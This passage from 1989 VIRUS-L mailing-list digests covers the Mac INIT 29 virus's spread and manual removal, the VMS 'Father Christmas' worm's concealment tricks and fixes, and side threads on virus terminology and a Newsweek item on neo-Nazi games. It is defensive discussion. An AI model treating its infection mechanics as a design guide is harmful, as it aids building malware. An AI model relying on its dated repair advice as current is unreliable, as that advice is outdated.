  12621. I became very, very concerned about the problem, as I found by using
  12622. the Virus Detective* desk accessory to search for 712 byte CODE and
  12623. INIT resources that there was also an INIT ID 29 installed in most
  12624. documents, other INIT files such as Pyro* & Suitcase II, the System of
  12625. course, the Desktop file, and all font and DA suitcase files, as well
  12626. as font printer drivers such as the LaserWriter driver, and Adobe
  12627. printer fonts.  Some applications such as PageMaker, Freehand and
  12628. Illustrator, had literally dozens of extra 712-byte CODE resources
  12629. added.  They grew bigger on each startup and during each boot, whether
  12630. started up or not.
  12631.  
  12632.  
  12633. HOW RINIT 29S WORKS:
  12634.  
  12635. After some 57 hours of research and virus fighting labor at Kinko's 2
  12636. infected local stores, I have determined the following:
  12637.  
  12638. 1.  The INIT 29 Virus will not accept locked disks after it has been
  12639. fully activated on an infected system.  This is the easiest way to
  12640. find out if you are fully infected.  However, since this symptom does
  12641. not occur immediately, you will also need to make further checks.
  12642.  
  12643. 2.  The virus first invades the Desktop file of a disk when a program
  12644. is copied onto it, inserting the 712 byte INIT ID 29 resource into it.
  12645. (Alternately, the INIT is added to a system file if an infected
  12646. application is started up, even without being copied to the disk.)
  12647.  
  12648. 3.  On the next boot, the INIT is added to the System from the desktop
  12649. file (or elsewhere, perhaps), and to every application (as a new code
  12650. resource numbered one higher than the existing resource ID, and
  12651. adjusted CODE ID 0 resource) that is used during that work session,
  12652. and to most documents created by the infected applications during the
  12653. session.
  12654.  
  12655. 4.  During the very next boot, the infected System will insert the
  12656. INIT or CODE resources into every targeted file on the hard disk (or
  12657. diskette), including:
  12658.  
  12659.         % The actual Desktop file of the operative system disk (hard
  12660.           disk or not)
  12661.  
  12662.         %  INITs such as Suitcase II, Pyro*, etc.
  12663.  
  12664.         %  CDEVs, RDEVs, and other system folder files
  12665.  
  12666.         % All applications and programs containing CODE resources,
  12667.           with Illustrator 88, Freehand 2.0 and PageMaker 3.0 getting
  12668.           (2) new 712 byte resources per each use or boot.  Others
  12669.           seem to stay content to keep only one extra CODE resource.
  12670.  
  12671.         % Most document files, including those created by MS Word,
  12672.           MacWrite, Ready,Set,Go!, PageMaker, Illustrator, Freehand,
  12673.           and MS Works.  Oddly, MacPaint files seemed to be free of
  12674.           the INIT.
  12675.  
  12676.         % All Rscreen fontS files (whether for imagewriter or
  12677.           laserwriter, new or old versions), all Desk Accessory files,
  12678.           new or old, all LaserWriter printer drivers, including those
  12679.           used by Cassidy, Adobe and Apple fonts, Laser Prep and Aldus
  12680.           Prep files, etc.
  12681.  
  12682. 5.  During invasion of an application, the INIT 29 Virus makes itself
  12683. a vital part of the application, by changing the applications
  12684. "jump-table" or CODE ID = 0 resource to list it as the FIRST SEGMENT
  12685. TO BE RUN ON LAUNCH.  The address of the next segment of CODE to be
  12686. run is copied from the jump table into the virus itself.  This means
  12687. that removing the virus will kill the application (very much like some
  12688. protoplasmic viruses).  The title of this report is taken from the
  12689. address of the order to run first, namely the eleventh word of the
  12690. jump table, which is changed to read the new address of the virus
  12691. instead of the first segment of the original program CODE.  It is this
  12692. word that is changed by most Mac viruses, at least so far, to ensure
  12693. that they are run before any other, possibly anti-viral, instructions.
  12694.  
  12695.  
  12696. SYMPTOMS OF THE INFECTION INCLUDE:
  12697.  
  12698.         % After the infected system is rebooted with the INIT running,
  12699. it will not accept locked disks.  It provides the alert saying that
  12700. the disk suffers from minor damage and asks to repair it.  You say OK
  12701. and then it ejects the disk saying, of course, that the Desktop file
  12702. could not be rebuilt on it.
  12703.  
  12704.         % After the infection is mature, often several days old, it
  12705. begins to interrupt printing and cause documents to fail to print.
  12706. This has especially been noticed with MacWrite, MS Word, PageMaker,
  12707. Illustrator and Ready,Set,Go!  This seems to be an intermittent
  12708. problem, and can sometimes express itself very soon after infection.
  12709. {Apple's own Virus Information Report says this is most likely due to
  12710. the Vertical Screen Blanking Interval being used by the virus to do
  12711. its work, and the work cycle of the virus running too long and
  12712. interfering with the printing tasks.}
  12713.  
  12714.         % Also after a mature infection of several days, the system
  12715. seems to of ten fail to boot from the infected disk, giving a System
  12716. Error ID 02.  {Robert Wright tells me that that this is due to the
  12717. Virus trying to use parts of the system which have not yet loaded into
  12718. RAM.}
  12719.  
  12720.  
  12721. FOR EMERGENCY ACTION:
  12722.  
  12723.         % Don't rely entirely on Vaccine 1.01 from CE Software, or
  12724. Apple's own VirusRX 1.4a2, or any other currently available program
  12725. other than Virus Detective* DA, version 2.0 (1.2 will do, but is not
  12726. as flexible, and will sometimes give false reports of removing locked
  12727. or protected viral resources).
  12728.  
  12729.         % You will need to type 3 new lines of search instructions
  12730. into Virus Detective* 1.2: INIT ID 29, INIT Size 712, CODE Size 712.
  12731. (Virus Detective* 2.0 comes setup for several viruses including INIT
  12732. 29 already.)  So far, the only two programs I have found with
  12733. legitimate CODE resources of 712 bytes are the fun PD programs
  12734. Biorhythm and Geographic.  Others you may find are most likely
  12735. infected and need to be removed from your hard disk.
  12736.  
  12737.         NOTE: Simply removing the INIT is good enough from the
  12738. infected non-application files, but applications will bomb if they are
  12739. restarted after only removing the 712 byte CODE sections.  Their
  12740. jump-table, or CODE ID = 0 resource has been re-written by the virus
  12741. to look for the VirusUs own CODE segment.  Since the segment will no
  12742. longer be there after you remove it, the System will crash with a
  12743. System Error ID 15 {Robert Wright tells me this is a "segment loader"
  12744. failure}.  If you know how to use ResEdit, you can replace words 9,
  12745. 10, 11 and 12 in Code Segment 0 with words 16, 17, 18 and 19 of the
  12746. top-most viral code segment.  Then remove the viral code segment(s) by
  12747. RclearingS them.  Remember that many applications may have received
  12748. many, many segments of the 712 byte viral code.  The newest segment,
  12749. or highest numbered one, will be the one containing the proper words
  12750. for copying back into the code 0 segment.  Be certain to removed all
  12751. viral segments.  If you are not willing or able to re-write the code
  12752. using ResEdit as described here, rely on your original master disk
  12753. (which should always, of course, be kept locked), and simply replace
  12754. the damaged copy with another clean one.
  12755.  
  12756.         % Be sure that you do not miss a single infected file,
  12757. especially the Desktop, System, Finder or INITs, CDEVs, or RDEVs.
  12758. Also, check ALL your diskettes.  They can be infected, even if no
  12759. programs have been copied from them or to them.  Simple insertion into
  12760. an infected hard disk computer set-up infects them.  You can then run
  12761. your system again.
  12762.  
  12763.         % The Virus Detective* 1.2 desk accessory will not remove
  12764. certain INIT ID 29 resources from documents and other files, since
  12765. they are locked or protected by the virus.  Sometimes it claims to
  12766. have removed the infections EVEN THOUGH IT HAS NOT DONE SO, and
  12767. sometimes it tells you it actually failed.  Don't trust it completely.
  12768. (Version 2.0 of the DA may do this job better, and comes fixed to look
  12769. for Peace, Scores, nVIR, hPAT, and INIT 29.)  Go into ResEdit and
  12770. check all questionable files and clear out the locked INIT ID 29s.  To
  12771. encourage great Mac-ers like the author of this program, Jeffry
  12772. Shulman, be sure to send him his money Q $ 20.00 is a bargain!  His
  12773. address is Q P.O. Box 521, Ridgefield, CT 06877-0521.
  12774.  
  12775. I understand from talking with people in the LAMG and elsewhere that
  12776. this virus is as yet not well known around LA.  However, rumors of the
  12777. virus have cropped up, evidently occurring some weeks ago in the Simi
  12778. Valley.  Members of the Canejo-Ventura area Mac Users Group reported a
  12779. new virus which added INIT ID 29 to various applications on hard
  12780. disks.  As far as I know, no application has yet been written by their
  12781. group to repair jump tables of infected applications.  Of course, this
  12782. report is posted on several local BBS units and 100 copies were given
  12783. away at the January MacValley meeting to interested members.
  12784. Communication is also being performed with other regional BBS units
  12785. and interested parties in an effort to fight the growing epidemic of
  12786. INIT 29 and its associated problems.
  12787.  
  12788.  
  12789. FUTURE EFFORTS:
  12790.  
  12791. We are now working on efforts to automatically detect the infection of
  12792. the INIT 29 Virus and to prevent its operation.  MacValley members
  12793. should expect to receive further information by the next meeting, in
  12794. February.  Other efforts are being made to provide a program that will
  12795. automatically repair infected documents, files, and applications.
  12796.  
  12797. Until such programs are available, you would be advised to avoid using
  12798. public service bureau computers for laser printing or otherwise
  12799. WITHOUT FIRST LOCKING YOUR DISKETTES, then copying the data onto their
  12800. hard disks for revision or printing.  If your locked disk is rejected,
  12801. DO NOT UNLOCK IT.  You may unlock it, and try to copy it, print it and
  12802. or revise it on their hard disk.  DO NOT RECOPY THE REVISED VERSION OF
  12803. YOUR FILE TO YOUR DISK unless you are willing to accept the
  12804. consequences of an infection at home.  NOTE: Some document files after
  12805. infection fail to copy, due apparently to their "protect" bit being
  12806. set by the virus.  This is the cause of much frustration at such
  12807. service bureaus.
  12808.  
  12809.  
  12810. FURTHER REPORTS OF INFECTIONS,
  12811. NEW VIRUS SYMPTOMS, ETC.:
  12812.  
  12813. Any further information, elaboration on the symptoms, or other virus
  12814. reports would be appreciated .  Call Thomas Bond at 818-843-0567, or
  12815. David Lagerson, MacValley President, at 818-882-4467.
  12816.  
  12817. end forwarded message-------------------------------------------------
  12818.  
  12819. ------------------------------
  12820.  
  12821. Date:         Sat, 28 Jan 89 09:59:55 EST
  12822. From:         "John P. McNeely" <JMCNEELY@UTCVM.BITNET>
  12823. Subject:      Apple Viruses? (NOT Mac)
  12824.  
  12825.     Does anyone know of ANY virus that infects Apple computers? It
  12826. seems that all of the virus attacks you hear about affect PCs or MACs.
  12827. There is certainly a substantial amount of Apples being used,
  12828. especially in schools. Why have they not become a popular target for
  12829. viruses?
  12830.  
  12831. Anyone ?
  12832.  
  12833. John P. McNeely
  12834.  
  12835. BITNET ADDRESS: JMCNEELY@UTCVM.BITNET
  12836.  
  12837. [Ed. I assume that you mean the Apple ][ series...]
  12838.  
  12839. ------------------------------
  12840.  
  12841. Date:     Sat, 28 Jan 89 15:43 EST
  12842. From:     Dimitri Vulis <DLV@CUNYVMS1.BITNET>
  12843. Subject:  FRG Nazi virus? Huh?
  12844.  
  12845. >From Newsweek, Jan 23, 1989, p. 32:
  12846.  
  12847. Nazi Software: The Ultimate Virus
  12848.  
  12849. West Germany has given new meaning to the term computer virus:
  12850. infecting the electronic bulletin boards of the Federal Republic are a
  12851. growing number of neo-Nazi computer games. They bear names like
  12852. ``Aryan test'', and ``Concentration Camp Manager''. Players of
  12853. ``Cleaning Up Germany'' score points by killing Jews, Turks,
  12854. homosexuals and environmentalists to the strains of ``Deutschland
  12855. \"uber Alles''. The ``Anti-Turks Test'' features the digitized voice
  12856. of Nazi propaganda minister Joseph G\"obbels.
  12857.  
  12858. Though illegal in West Germany, the game disks are swapped in
  12859. schoolyards and circulated though computer networks, making
  12860. interdiction nearly impossible. The authorities know of at least 20
  12861. games---but don't know who's designing them.  Last year a raid on
  12862. apartments of suspected neo-Nazis netted copies of some of the games,
  12863. but no proof they were produced on site. By the end of 1987, about 11
  12864. percent of German households has a personal computer, and, warns
  12865. Jurgen Lindenau of the Office for Youth Protection, ``One should
  12866. assume that just about every youngster who owns a computer and uses it
  12867. for playing games has come across the Nazi software sooner or later''.
  12868. The hope is the games are too crude for anything beyond brief
  12869. curiosity.
  12870.  
  12871. There's also a photo (captioned `Aryan Test') of an (apparently C64)
  12872. screen showing assorted swastikas and magen Davids and the text:
  12873.  
  12874. ARIERTEST                                (Arian test)
  12875.  
  12876. ARIER ODER JUDE?                         (Arian or Jew?)
  12877. DAS IST RIER DIE FRAGE                   (That is the question)
  12878.  
  12879. (C) 1986 BY ADOLF HITLER SOFTWARE LTD.
  12880.  
  12881. - ----
  12882.  
  12883. I must note that I find the idea of government censorship applied to
  12884. the contents of computer games much more (disgusting, abhorrent,
  12885. sickening) than the (disgusting, abhorrent, sickening) Nazi
  12886. propaganda. If those Germans had any brains, they would leave these
  12887. sickos alone, instead of encouraging them with the free publicity.
  12888. Perhaps this is what they have in mind?
  12889.  
  12890. >From what I understand/heard before, we're just talking about
  12891. programs being up/downloaded, to/from BBSs, not programs that infect
  12892. other programs with Nazi messages. The article quoted above has
  12893. nothing to do with viruses, except the headline. The author's/editor's
  12894. stupidity and ignorance do not surprise me the least bit after the
  12895. ``360 concentric circles of data'' (360K / 40 tracks confusion) in the
  12896. Time article last fall. It seems however that the media (read:
  12897. J-school morons) has now appropriated the term ``computer virus'' and
  12898. uses it to designate ``any buggy, malicious, destructive or offensive
  12899. program''. Perhaps we should start looking for another term to
  12900. designate ``a program that can `infect' other programs by modifying
  12901. them to include a possibly evolved copy of itself''. (This seems
  12902. silly; but after 10 years I've stopped applying the term ``hacker'' to
  12903. myself for similar reasons.)
  12904.  
  12905. Any comments or suggestions?
  12906.  
  12907. P.S. Our VAX has apparently been trashing mail lately. I will comment
  12908. on the last 2 week's worth of this digest after I get it from a
  12909. server.
  12910.  
  12911. ------------------------------
  12912.  
  12913. End of VIRUS-L Digest
  12914. *********************VIRUS-L Digest              Monday, 30 Jan 1989         Volume 2 : Issue 31
  12915.  
  12916. Today's Topics:
  12917. Robert Morris, Jr.
  12918. Re: LeFebvre's message on origin of terms
  12919. RE: Origin of the term "virus"
  12920.  
  12921. ---------------------------------------------------------------------------
  12922.  
  12923. Date:     Mon 30 Jan 1989 06:46 CDT
  12924. From:     GREENY <MISS026@ECNCDC.BITNET>
  12925. Subject:   Robert Morris, Jr.
  12926.  
  12927. Anyone who is wondering what Robert Morris, Jr. looks like should have
  12928. a look at Page 66 in Discover Magazine (January 1989 issue)...
  12929.  
  12930. Bye for now but not for long
  12931. Greeny
  12932.  
  12933. BITNET: MISS026@ECNCDC
  12934. Internet: MISS026%ECNCDC.BITNET@CUNYVM.CUNY.EDU
  12935.  
  12936. ------------------------------
  12937.  
  12938. Date: 30 Jan 89
  12939. From: J.D. Abolins<OJA@NCCIBM1.BITNET>
  12940. Subject: Re: LeFebvre's message on origin of terms
  12941.  
  12942. Although the AIDS situation has contributed to the adoption of the
  12943. term "virus" for intrusively self-replicating codes, even before the
  12944. AIDS awareness, virus would probably have been adopted for this type
  12945. of program code.
  12946.  
  12947. First, the term virus existed well before the early 1980's when the
  12948. AIDS situation was first publicized. The general public had some
  12949. awareness of the nature of biological viruses from variety of other
  12950. cases- cancer, rhinovirus, etc.
  12951.  
  12952. Second, the parallel between the biological DNA/RNA coding and the
  12953. binary coding when comparing biological viruses with computer viruses
  12954. would be a logical connection. These parallels are not the result of
  12955. merely back-reading biological allusions into a type of computer code.
  12956.  
  12957. As for the application of the term "virus" to intrusivly self-replica-
  12958. ting code futher back than 5 or 6 years, I know of no specific case.
  12959. Yet the terms worm and tapeworm had been applied to non-intrusively
  12960. replicating programs. (INterestingly enough, there was no epidemic of
  12961. parasitic diseases in the USA or globally in those years. So, the
  12962. origin of a usage does not always have to be based upon the current
  12963. fear or fad.) The reason that the term virus did not arise back then
  12964. was that any examples -real or conceptual- of such code was
  12965. practically unknown back then. The worm-type of programs were better
  12966. known.
  12967.  
  12968. This does bring up another aspect in the development of terms and
  12969. their usage- the perception of new categories emerging. The concept of
  12970. code we call viruses today was within the grasp of computer knowledge
  12971. and reasonable extrapolation for several decades. There was no giant
  12972. leap of technology in the past 5 years that was neccessary for
  12973. viruses.  Rather it was a matter of discerning that this categorycould
  12974. exist and then to conceptualize it.
  12975.  
  12976. ------------------------------
  12977.  
  12978. Date: Sun, 29 Jan 89 21:21 EST
  12979. From: LEFF@vms.cis.pittsburgh.edu
  12980. Subject: RE: Origin of the term "virus"
  12981.  
  12982. Not sure how long viruses have been around but I fondly remember my
  12983. first encounter with the concept in a book by David Gerrold called
  12984. "When Harlie Was One," published in 1972 by Ballantine.  Gerrold wrote
  12985. of a virus that auto dialed numbers, found other computers,
  12986. transmitted itself and kindly erased itself at the previous site.
  12987. Unfortunately, because of a bad connection, the program lost the code
  12988. for self erasing, and the "infection" spread widely and quickly.
  12989. Beyond these descriptions (starting on page 175) the book is an
  12990. interesting science fiction about artificial intelligence and machine
  12991. conciousnous.  Whether the virus program was fact or fiction at that
  12992. time, I don't know.
  12993.  
  12994. ------------------------------
  12995.  
  12996. End of VIRUS-L Digest
  12997. *********************VIRUS-L Digest             Tuesday, 31 Jan 1989         Volume 2 : Issue 32
  12998.  
  12999. Today's Topics:
  13000. CP/M viruses?
  13001. Re: "FRG Nazi virus" / relevance to computer virus discussions
  13002. INIT 29 further information and corrections (Mac)
  13003.  
  13004. ---------------------------------------------------------------------------
  13005.  
  13006. Date:         Tue, 31 Jan 89 05:03-0500
  13007. From:         David.Slonosky@QueensU.CA
  13008. Subject:      CP/M viruses?
  13009.  
  13010. This may seem like a ridiculous question, but I just recently received
  13011. a CP/M based computer (for free), and am wondering if any CP/M viruses
  13012. were ever reported. Was there a "Dirty Dozen" of CP/M software?
  13013. (Yeah, ya can quit gigglin' any time now!) :-)
  13014.  
  13015.                                        __________________________________
  13016.                                       |                                  |
  13017. David Slonosky/QueensU/CA,"",CA       |         Know thyself?            |
  13018. SLONOSKY@QUCDN                        |  If I knew myself, I'd run away. |
  13019.                                       |__________________________________|
  13020.  
  13021. ------------------------------
  13022.  
  13023. From: J.D. Abolins
  13024. Date: 31 Jan 89
  13025. Subject: Re: "FRG Nazi virus" / relevance to computer virus discussions
  13026.  
  13027. While I found the posting useful for an article I am writing about
  13028. misuses and abuses of computer technology, the posting had little
  13029. relevance to the VIRUS-L discussion list.  A far better spot for it
  13030. would be RISKS DIGEST; in fact this subject was brought up in recent
  13031. issue of RISKS.
  13032.  
  13033. The programs mentioned are not, repeat, are not computer viruses.
  13034. (They are, so to say, the viruses of the soul, but not of computers.)
  13035. These obnoxious programs are "free standing" programs.
  13036.  
  13037. As for FRG laws restricting such materials, there are major reasons
  13038. for it. If you would like to discuss this subject further, you're
  13039. welcome to doit off-line by e-mail to me.
  13040.  
  13041. [Ed. True, the actual programs had nothing to do with viruses.
  13042. However, the article that was cited called them viruses, and I don't
  13043. believe that a mention of that here was out of line.  It points out
  13044. the fact that the public is very confused over viruses, and that the
  13045. media is (apparently inadvertantly) only making matters worse.
  13046. Nonetheless, any discussions on FRG laws, etc., should be done
  13047. elsewhere, as Mr. Abolins suggests.
  13048.  
  13049. J.D., please include your network address on your From: line, if
  13050. possible.  Thanks.]
  13051.  
  13052. ------------------------------
  13053.  
  13054. Date: Tue, 31 Jan 89 08:46:42 -0500
  13055. From: Joel B Levin <levin@BBN.COM>
  13056. Subject: INIT 29 further information and corrections (Mac)
  13057.  
  13058. There have been a few misconceptions floating around about INIT29 and
  13059. how it works.  It is quite virulent, spreading at the drop of a hat,
  13060. and I don't want to minimize it; but there is a slight bit of
  13061. overstatement in what I have read and I want to try to correct it a
  13062. bit.
  13063.  
  13064. 1. If you have booted from a clean system (System file and INIT, cdev,
  13065. and RDEV type files are all clean), then you are running clean.
  13066. Nothing will happen if you put an infected disk in your drive, if you
  13067. look at an infected file with ResEdit or copy a file.  The ONLY thing
  13068. which does damage while you are running clean is to run an infected
  13069. application.  Doing so will infect your CURRENT System file.  That's
  13070. all it will do (not that it isn't enough); you will still be running
  13071. clean afterward.  Rebooting with an infected system file is necessary
  13072. before the serious damage starts.
  13073.  
  13074. 2. Booting from an infected system disk (one or more of your System
  13075. file and the INIT, cdev, and RDEV type files IN YOUR SYSTEM FOLDER are
  13076. infected) will cause your system to run dirty, i.e. with OpenResFile
  13077. patched to infect anything it opens.  Now you are in a state when
  13078. merely opening any file with a resource fork will infect it with
  13079. either an INIT 29 resource (if there is no CODE 0 resource) or with a
  13080. new CODE resource (if there is a CODE 0 resource).  It is thus true
  13081. that merely inserting a floppy disk (under Finder, not necessarily in
  13082. applications, which might not cause the Desktop file to be opened) a
  13083. copy of INIT29 "infects" the Desktop file on that disk.  And any
  13084. documents or other miscellaneous files which are opened for any reason
  13085. are likely to have an INIT29 written into them.  However, the only
  13086. significant INIT29's are those written into the System file or into a
  13087. type INIT, cdev, or RDEV file in the system folder.  In other files
  13088. the INIT29 resource is less like an infection than like a benign tumor
  13089. - -- it takes up space, is neither useful nor harmful, and sometimes
  13090. gets in the way of something and causes it to break.  [This doesn't
  13091. mean that some future virus couldn't activate it somehow.]
  13092.  
  13093. 3. The only sure way to deal with INIT29 at this moment is to have a
  13094. completely clean system on a hardware LOCKED diskette, complete with a
  13095. detection tool like VirusDetective.  All copies of INIT29 may be
  13096. safely removed.  All infected applications should be deleted and
  13097. restored from locked master disks (you did keep those around, of
  13098. course, and locked :-)).  At this moment I know of no available
  13099. programs capable of properly removing the infection from an
  13100. application-like file (i.e. has a CODE 0 resource), including Virex;
  13101. but I guarantee you there will be one or more available before long.
  13102.  
  13103.     /JBL
  13104.  
  13105. ------------------------------
  13106.  
  13107. End of VIRUS-L Digest
  13108. *********************VIRUS-L Digest             Thursday, 5 Jan 1989          Volume 2 : Issue 4
  13109.  
  13110. Today's Topics:
  13111. Re: Booting process (PC)
  13112. Disks Drive protection -gimme a break
  13113.  
  13114. ---------------------------------------------------------------------------
  13115.  
  13116. Date:         Wed, 04 Jan 89 21:36:04 EST
  13117. From:         "Homer W. Smith" <CTM@CORNELLC>
  13118. Subject:      Re: Booting process (PC)
  13119.  
  13120.      I recently tried to boot an executable but non bootable
  13121. disk I received from Germany.  I recieved the usual 'non system
  13122. disk, hit any key to continue' message IN GERMAN.  Clearly
  13123. the disk was read first and my pc which was booted from its usual
  13124. English hard disk knew something was up in the german disk.
  13125. Thus floppies are read before they are rejected as non bootable.
  13126.  
  13127. ------------------------------
  13128.  
  13129. Date:     Wed,  4 Jan 89 23:16 CDT
  13130. From:     <B645ZAX@UTARLG.BITNET>
  13131. Subject:  Disks Drive protection -gimme a break
  13132.  
  13133. I think we are all (well, almost all) tired of the disk drive
  13134. discussion, informative as it was.  I would like to suggest the
  13135. formation of another list, say, HARware SECurity List, where things of
  13136. this nature could be posted.  Readers: What do you think?  Send SHORT
  13137. responses here, long ones and flames to me direct.  If it is
  13138. warrented, I will summarize.
  13139.  
  13140. - -David Richardson
  13141. B645zax@utarlg (bitnet) b645zax@utarlg.arl.utexas.edu (internet)
  13142. ...!{ames, texbell!cs.utexas.edu}!utarlg.arl.utexas.edu!b645zax (uucp)
  13143.  
  13144. ------------------------------
  13145.  
  13146. End of VIRUS-L Digest
  13147. *********************VIRUS-L Digest              Friday, 6 Jan 1989           Volume 2 : Issue 5
  13148.  
  13149. Today's Topics:
  13150. Right to Purge Mail
  13151. Re: Disks Drive protection -gimme a break
  13152. re: copy protected disketts
  13153. Getting Mac Anti-viral Files
  13154. Clarificaton/More on the Father Christmas Worm (VAX/VMS)
  13155. Brain and the boot sequence (PC)
  13156. Re: creating government standards for software
  13157.  
  13158. ---------------------------------------------------------------------------
  13159.  
  13160. Date:  Thu, 5 Jan 89 08:42 EST
  13161. From:  WHMurray@DOCKMASTER.ARPA
  13162. Subject:  Right to Purge Mail
  13163.  
  13164. S. H. asks:
  13165.  
  13166. "Which takes priority,  the rights of the individuals receiving these
  13167. virus files or the responsibility of systems managers for securing their
  13168. systems against anwanted [sic] viri [sic]?"
  13169.  
  13170. I think that the question, as stated, is loaded.  Try "Is the
  13171. responsibility of the system manager to ensure that the majority of the
  13172. population receives the majority of its mail superior to his
  13173. responsibility to see that an individual receives a particular mailing?"
  13174.  
  13175. William Hugh Murray, Fellow, Information System Security, Ernst & Whinney
  13176. 2000 National City Center Cleveland, Ohio 44114
  13177. 21 Locust Avenue, Suite 2D, New Canaan, Connecticut 06840
  13178.  
  13179. ------------------------------
  13180.  
  13181. Date:         Thu, 5 Jan 1989 08:55:01 EDT
  13182. From:         "W. K. (Bill) Gorman" <34AEJ7D@CMUVM.BITNET>
  13183. Subject:      Re: Disks Drive protection -gimme a break
  13184.  
  13185. >From:     <B645ZAX@UTARLG.BITNET>
  13186. >I would like to suggest the formation of another list...
  13187. >...  Readers: What do you think?
  13188.  
  13189. Not much. Personally, I *much* prefer having information available
  13190. quickly from a centralized location, not spread over
  13191. Gxx-knows-how-many separate lists.
  13192.  
  13193. >- -David Richardson
  13194.  
  13195. *******************************************************************************
  13196. * A CONFIDENTIAL COMMUNICATION FROM THE VIRTUAL DESK OF:                      *
  13197. *******************************************************************************
  13198. ...............................................................................
  13199. |W. K. "Bill" Gorman                 "Do             Foust Hall # 5           |
  13200. |PROFS System Administrator        SOMETHING,        Computer Services        |
  13201. |Central Michigan University      even if it's       Mt. Pleasant, MI 48858   |
  13202. |34AEJ7D@CMUVM.BITNET                wrong!"         (517) 774-3183           |
  13203. |_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_|
  13204. |Disclaimer: These opinions are guaranteed against defects in materials and   |
  13205. |workmanship for a period not to exceed transmission time.                    |
  13206. |.............................................................................|
  13207.  
  13208. ------------------------------
  13209.  
  13210. Date:         Thu, 05 Jan 89 12:32:40 CST
  13211. From:         DON STRUBE <MN002189@NDSUVM1.BITNET>
  13212. Subject:      re: copy protected disketts
  13213.  
  13214. I joined this list last week and have tried to come up-to-speed on the
  13215. conversations on this list by reading old digests.  I agree that the
  13216. copy protection thing has been beat to death and there still seems to
  13217. be a difference of opinion among the 'experts' writting to this list.
  13218. Since everything changes so fast in the world of computing I am sure
  13219. the correct response today will be incorrect next week anyway so lets
  13220. drop it and move forward.
  13221.  
  13222. ------------------------------
  13223.  
  13224. Date:         Thu, 05 Jan 89 17:02:04 EST
  13225. From:         Joe McMahon <XRJDM@SCFVM.BITNET>
  13226. Subject:      Getting Mac Anti-viral Files
  13227.  
  13228. Would the person who sent me mail asking about the anti-virals here at
  13229. SCFVM please send me another message? Your message was misaddressed,
  13230. and forwarded to me by the postmaster without a reply-to field.
  13231. Thanks.  To all who are not concerned, sorry.
  13232.  
  13233. - --- Joe M.
  13234.  
  13235. ------------------------------
  13236.  
  13237. Date:    5-JAN-1989 19:38:09.58
  13238. From:   <FASTEDDY@DFTBIT.BITNET>
  13239. Subject: Clarificaton/More on the Father Christmas Worm (VAX/VMS)
  13240. Comments: BSMTP envelope created by ENVELOPE.COM version T1.0
  13241.  
  13242. Greetings,
  13243.  
  13244. What I found disturbing about the recent outbreak of "Father
  13245. Christmas" worm (a.k.a. HI.COM) was that some of the techniques used
  13246. in the "Internet worm" were duplicated in HI.COM.
  13247.  
  13248. One point where HI.COM looked like the "Internet worm" was causing the
  13249. source program to "disappear". This was accomplished by copying the
  13250. entire program into a DCL symbol array and then deleting the disk copy
  13251. of the program.  The program continued to execute since it had been
  13252. loaded and running already, and when it wanted to propagate to another
  13253. node it just dumped the symbol array.  The result was that you could
  13254. not observe (by using SHOW DEVICE/FILES) what the command procedure
  13255. was even though it was executing.  This made getting a copy of the
  13256. procedure and deciphering it difficult.
  13257.  
  13258. A second "lookalike" feature is that it moved through the network very
  13259. rapidly, and thus attracted attention quickly.  Infection attempts
  13260. were hitting my machine on the order of 3 or 4 tries every 5 minutes.
  13261. We run a homebrew network alarm package called NETINFO which told us
  13262. the type of attempt, and where it was coming from.  After the 8th file
  13263. transfer attempt in as many minutes I got curious and started looking.
  13264. If the program hadn't been so voracious, it might not have had
  13265. attracted so much attention on the beginning of a holiday weekend.
  13266.  
  13267. Anyhow, I am a new subscriber to VIRUS-L and I saw a few bits and
  13268. pieces in the digest (8901A) that ought to be "fleshed out".
  13269.  
  13270. Networks affected by the worm: Any DECnet network directly connected
  13271. to SPAN (The NASA Space Physics Analysis Network) or HEPnet (DOE -
  13272. High Energy Physics Network) was subject to infection. I have not
  13273. heard of any infections in THEnet, CCnet or Easynet at this time.  The
  13274. method of transmission was by DECnet on VMS systems only.
  13275.  
  13276. The process name used by the worm was "MAIL_178DC".  This was intended
  13277. to disguise the worm as a DECnet mail delivery process.  However, the
  13278. worm did not connect to another DECnet mail delivery process on a
  13279. remote node. Instead it connected to FAL, which is the file transfer
  13280. process.  This information is available from the command MCR NCP SHOW
  13281. KNOWN LINKS and is one way to distinguish the worm from a real MAIL
  13282. transfer process.
  13283.  
  13284. The short term fix that was proposed here at NASA/GSFC was to disable
  13285. the DECnet object that runs command procedures on remote nodes.  This
  13286. object is known as TASK or Object number 0.
  13287.  
  13288. Currently, it appears that the best long term fix without seriously
  13289. limiting DECnet functionality is to use a separate FAL (File transfer)
  13290. account.  A model FAL account can be found in the VAX/VMS Guide To
  13291. System Security.  Another proposed improvement would be to stop using
  13292. the default account/password of DECNET/DECNET for network
  13293. default-access accounts.  Finally, the worm needed to run AUTHORIZE,
  13294. which is system utility that users (both local and remote) should be
  13295. prevented from using.
  13296.  
  13297. Brian Lev who provided some of the information in the messages from
  13298. Steve Goldstein (goldstein@nsipo.nasa.gov) works for the Advanced Data
  13299. Flow Technology Office (Not CSDR) at NASA/Goddard Space Flight Center.
  13300. He can be contacted at LEV@DFTBIT.BITNET or LEV@DFTNIC.GSFC.NASA.GOV.
  13301. His counterpart at CSDR who snagged the copy of the worm posted to
  13302. VIRUS-L was me (John McMahon), I can be contacted at
  13303. FASTEDDY@DFTBIT.BITNET or FASTEDDY@DFTNIC.GSFC.NASA.GOV.
  13304.  
  13305. Since I will be giving a talk on the "Father Christmas" worm on Friday
  13306. the 13th (ominous, isn't it), I would be interested in any information
  13307. on it that hasn't already been shipped through VIRUS-L.  I am
  13308. especially interested in any proposed fixes that haven't been
  13309. mentioned, and also details on how widespread the worm was.  Thank you
  13310. very much, and Happy New Year!
  13311.  
  13312. John "Fast-Eddie" McMahon
  13313. ST Systems Corporation
  13314. Advanced Data Flow Technology Office - Code 630.4
  13315. Formerly COBE Science Data Room - Code 401.1
  13316. NASA Goddard Space Flight Center, Greenbelt, Maryland 20771
  13317.  
  13318. Bitnet:         FASTEDDY@DFTBIT  (old: FASTEDDY@IAFBIT)
  13319. Arpa:           FASTEDDY@DFTNIC.GSFC.NASA.GOV
  13320. Span:           SDCDCL::FASTEDDY (Node 6.9)
  13321.  
  13322. ------------------------------
  13323.  
  13324. Date:     Thu,  5 Jan 89 22:43 EST
  13325. From:     Dimitri Vulis <DLV@CUNYVMS1.BITNET>
  13326. Subject:  Brain and the boot sequence (PC)
  13327.  
  13328. There seems to be some confusion concerning which part of boot logic
